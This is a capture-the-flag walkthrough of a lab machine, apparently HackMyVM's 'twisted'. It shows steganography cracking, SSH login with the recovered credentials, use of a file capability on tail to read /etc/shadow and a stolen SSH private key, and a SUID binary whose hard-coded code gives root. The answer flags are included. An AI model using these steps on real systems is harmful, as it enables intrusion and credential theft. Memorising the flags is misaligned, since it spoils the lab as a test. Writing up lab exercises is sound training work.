Nmap
Full TCP port scan first:
┌──(kali㉿kali)-[/tmp/235]
└─$ nmap -p0-65535 --min-rate 5000 192.168.205.235
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-19 08:25 -0400
Nmap scan report for 192.168.205.235
Host is up (0.00032s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:C3:24:40 (Oracle VirtualBox virtual NIC)
Ports 80 and 2222 are open. The services table labels 2222 as EtherNetIP-1 (that is only the IANA name for the port number); version detection (nmap -sV) confirms it is actually SSH.
Web 80
Homepage content:
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
The page shows two cat pictures; the caption "seems different" on cat-hidden.jpg hints at steganography.
Cracking the steganography with Stegseek
Download the image and brute-force the steghide passphrase with stegseek:
┌──(kali㉿kali)-[/tmp/235]
└─$ stegseek cat-hidden.jpg /mnt/hgfs/gx/x/5000q.txt -xf stegout.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "stegout.txt".
The passphrase is sexymama and the embedded file was originally named mateo.txt, which points to a user called mateo.
Read the extracted content:
┌──(kali㉿kali)-[/tmp/235]
└─$ cat stegout.txt
thisismypassword
This gives the credentials mateo:thisismypassword.
SSH mateo
┌──(kali㉿kali)-[/tmp/235]
└─$ ssh -p 2222 mateo@192.168.205.235
mateo@twisted:~$ id
uid=1000(mateo) gid=1000(mateo) groups=1000(mateo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Read the note in the home directory:
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
gogogo.wav Morse code decoding
Download the wav file and look at its tone frequency and timing: it is standard Morse code audio (long tone 240 ms = dash, short tone 90 ms = dot):
--. --- -.. . . .--. . .-. ... -.-. --- -- . .-- .. - .... -- . ... .-.. .. - - .-.. . .-. .- -... -... .. - ...
Decoded:
GO DEEPER... COME WITH ME... LITTLE RABBIT...
A rabbit hole.
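As an added example (not part of the original writeup), the following Python script shows the timing-based decoding described above: it synthesises Morse audio with the 90 ms / 240 ms timings as a constructed sample (not the real gogogo.wav), measures tone and silence run lengths from the sample envelope, and maps them back to letters. The 800 Hz tone, 8 kHz sample rate and the amplitude threshold are assumptions; the real file's sample rate is read from its header.

```python
import io
import math
import struct
import wave

# Timings from the writeup: 90 ms dot, 240 ms dash. Standard Morse gaps are
# 1 unit between symbols, 3 units between letters, 7 units between words.
DOT_MS, DASH_MS = 90, 240
SAMPLE_RATE = 8000   # assumption for the synthesized sample
TONE_HZ = 800        # assumption for the synthesized sample
FRAME_MS = 10        # analysis window; all durations above are multiples of it

MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
    "G": "--.", "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..",
    "M": "--", "N": "-.", "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.",
    "S": "...", "T": "-", "U": "..-", "V": "...-", "W": ".--", "X": "-..-",
    "Y": "-.--", "Z": "--..",
}
REVERSE = {code: letter for letter, code in MORSE.items()}


def _tone(ms):
    n = SAMPLE_RATE * ms // 1000
    return [int(12000 * math.sin(2 * math.pi * TONE_HZ * i / SAMPLE_RATE))
            for i in range(n)]


def _silence(ms):
    return [0] * (SAMPLE_RATE * ms // 1000)


def encode_wav(text):
    """Constructed sample input: synthesize 16-bit mono Morse audio as WAV bytes."""
    samples = []
    for wi, word in enumerate(text.upper().split()):
        if wi:
            samples += _silence(7 * DOT_MS)
        for li, letter in enumerate(word):
            if li:
                samples += _silence(3 * DOT_MS)
            for si, symbol in enumerate(MORSE[letter]):
                if si:
                    samples += _silence(DOT_MS)
                samples += _tone(DOT_MS if symbol == "." else DASH_MS)
    samples += _silence(3 * DOT_MS)
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(SAMPLE_RATE)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def wav_to_morse(wav_bytes, threshold=2000):
    """Recover dots, dashes and gaps from 16-bit mono audio by run-length timing.

    Each FRAME_MS window is 'on' if its peak amplitude exceeds the threshold;
    consecutive on/off windows are merged into runs and classified by duration
    against the midpoints between the expected Morse timings."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        rate = w.getframerate()
        raw = w.readframes(w.getnframes())
    samples = struct.unpack("<%dh" % (len(raw) // 2), raw)
    frame = rate * FRAME_MS // 1000
    windows = [max(abs(s) for s in samples[i:i + frame]) > threshold
               for i in range(0, len(samples) - frame + 1, frame)]
    runs = []  # [is_tone, duration_ms]
    for on in windows:
        if runs and runs[-1][0] == on:
            runs[-1][1] += FRAME_MS
        else:
            runs.append([on, FRAME_MS])
    dot_or_dash = (DOT_MS + DASH_MS) / 2      # 165 ms
    symbol_or_letter = (1 + 3) * DOT_MS / 2    # 180 ms
    letter_or_word = (3 + 7) * DOT_MS / 2      # 450 ms
    out = []
    for on, ms in runs:
        if on:
            out.append("." if ms < dot_or_dash else "-")
        elif ms < symbol_or_letter:
            continue                 # gap inside a letter
        elif ms < letter_or_word:
            out.append(" ")          # gap between letters
        else:
            out.append(" / ")        # gap between words
    return "".join(out).strip(" /")


def morse_to_text(morse):
    """Map dot/dash groups to letters; '/' separates words, '?' marks unknown groups."""
    return " ".join("".join(REVERSE.get(sym, "?") for sym in word.split())
                    for word in morse.split("/"))


def decode_wav(wav_bytes):
    return morse_to_text(wav_to_morse(wav_bytes))


if __name__ == "__main__":
    sample = encode_wav("GO DEEPER")
    print(wav_to_morse(sample))   # --. --- / -.. . . .--. . .-.
    print(decode_wav(sample))     # GO DEEPER
```

On a real capture, read the file with `wave.open(path, "rb")` instead of the synthesized bytes and tune `threshold` to the recording's noise floor; the dot/dash and gap thresholds only need to sit between the measured durations, so the 90/240 ms figures from the writeup can be adjusted once the first few runs are printed.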
Capability privilege escalation
Enumerating file capabilities:
mateo@twisted:~$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
tail carries cap_dac_read_search, which bypasses the kernel's DAC read and directory-search checks, so it can read any file regardless of its mode bits. Because the effective bit is set (+ep), the capability is active as soon as the binary executes, without the program having to request it.
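As an added example (not from the writeup), here is a small Python triage of getcap -r output: it parses both libcap output formats, flags capabilities that hand a local user a file-read, file-write or UID-change primitive, and records whether the effective flag is set. The sample output is constructed: the ping and tail lines are the ones found on the box, the python3.9 and gdb lines are assumptions added to show the newer output format and the +p-only case.

```python
import re

# Capabilities that hand an unprivileged caller a primitive that usually
# collapses into root: arbitrary file read, arbitrary file write, or UID change.
DANGEROUS = {
    "cap_dac_read_search": "read any file and traverse any directory (shadow, keys)",
    "cap_dac_override": "bypass all DAC checks, read and write any file",
    "cap_setuid": "setuid(0) from the binary gives a root shell",
    "cap_setgid": "change group identity",
    "cap_sys_admin": "mount, namespaces and much more; effectively root",
    "cap_sys_ptrace": "attach to and inject into privileged processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of arbitrary files",
    "cap_fowner": "bypass ownership checks on files",
    "cap_setfcap": "grant file capabilities to other binaries",
}

CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=])([eip]*)$")


def parse_getcap(output):
    """Parse `getcap -r /` output in either libcap format:

        /usr/bin/ping = cap_net_raw+ep    (older libcap)
        /usr/bin/ping cap_net_raw=ep      (newer libcap)

    Returns {path: {capability: set(flags)}}; flags are e/i/p.
    Paths containing whitespace are not handled (fine for this sample)."""
    result = {}
    for line in output.splitlines():
        parts = line.split()
        if not parts:
            continue
        path, clauses = parts[0], [p for p in parts[1:] if p != "="]
        caps = result.setdefault(path, {})
        for clause in clauses:
            m = CLAUSE_RE.match(clause)
            if not m:
                continue
            names, _op, flags = m.groups()
            for name in names.split(","):
                caps.setdefault(name, set()).update(flags)
    return result


def triage(parsed):
    """Return [(path, capability, effective, rationale)] for dangerous capabilities.

    effective=False (+p only) means the binary must raise the capability
    itself with capset(); a stock coreutils tail never does, so only +ep
    turns it into an arbitrary file reader."""
    findings = []
    for path, caps in sorted(parsed.items()):
        for name, flags in sorted(caps.items()):
            if name in DANGEROUS:
                findings.append((path, name, "e" in flags, DANGEROUS[name]))
    return findings


# Constructed sample: ping and tail as found on the box; the other two lines
# are assumptions added to show the newer format and the +p-only case.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/bin/python3.9 cap_setuid=ep
/usr/bin/gdb = cap_sys_ptrace+p
"""

if __name__ == "__main__":
    for path, cap, effective, why in triage(parse_getcap(SAMPLE_GETCAP)):
        state = "effective at exec" if effective else "permitted only"
        print(f"{path}: {cap} ({state}) -> {why}")
```

cap_net_raw on ping is the normal distribution default and is deliberately not flagged; the interesting line is any coreutils or interpreter binary carrying one of the DANGEROUS set with the e flag.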
Read /etc/shadow:
mateo@twisted:~$ tail /etc/shadow
mateo:$6$j5ATD8qkkcGCCU1h$...:18549:0:99999:7:::
markus:$6$kHfI3QtIBB47N75s$...:18549:0:99999:7:::
bonita:$6$8JsoW6Q5O8faA1cd$...:18549:0:99999:7:::
Read markus's note (mateo has no permission to read it directly):
mateo@twisted:~$ tail /home/markus/note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
HMVblackcat
Key information: /var/cache/apt/id_rsa holds bonita's SSH private key.
Read bonita's private key (tail -n +1 prints from the first line, i.e. the whole file):
mateo@twisted:~$ tail -n +1 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
...
-----END OPENSSH PRIVATE KEY-----
SSH bonita
Save the key locally as id_rsa_bonita (ssh refuses a key that is group- or world-readable, hence the chmod 600) and log in:
┌──(kali㉿kali)-[/tmp/235]
└─$ chmod 600 id_rsa_bonita && ssh -i id_rsa_bonita -o StrictHostKeyChecking=no -p 2222 bonita@192.168.205.235
bonita@twisted:~$ id
uid=1002(bonita) gid=1002(bonita) groups=1002(bonita)
SUID privilege escalation
A SUID binary, beroot, is found in bonita's home directory.
-rwsrws--- 1 root bonita 16864 Oct 14 2020 /home/bonita/beroot
It is setuid root and setgid bonita, and executable only by root and members of the bonita group. Running it asks for a code:
bonita@twisted:~$ /home/bonita/beroot
Enter the code:
WRONG
Disassembling main:
0000000000001185 <main>:
11a5: lea -0x4(%rbp),%rax
11a9: mov %rax,%rsi
11ac: lea 0xe63(%rip),%rdi # "%d" format string
11b8: call scanf@plt
11bd: mov -0x4(%rbp),%eax
11c0: cmp $0x16f8,%eax # compare with 0x16f8 = 5880
11c5: jne 11f8 <main+0x73>
11c7: call setuid@plt # setuid(0)
11e0: call setgid@plt # setgid(0)
11e5: lea "/bin/bash",%rdi
11f1: call system@plt # system("/bin/bash")
11f8: lea "WRONG",%rdi
11ff: call puts@plt
The program reads one integer with scanf("%d") and compares it with the immediate 0x16f8 (decimal 5880); on a match it calls setuid(0), setgid(0) and system("/bin/bash"), otherwise it prints WRONG. The code is hard-coded as a compare operand, so it is recoverable straight from the disassembly.
Root
Enter 5880 interactively:
bonita@twisted:~$ /home/bonita/beroot
Enter the code:
5880
root@twisted:~# id
uid=0(root) gid=0(root) groups=0(root),1002(bonita)
root@twisted:~# cat /root/root.txt
HMVwhereismycat
User flag:
root@twisted:~# cat /home/bonita/user.txt
HMVblackcat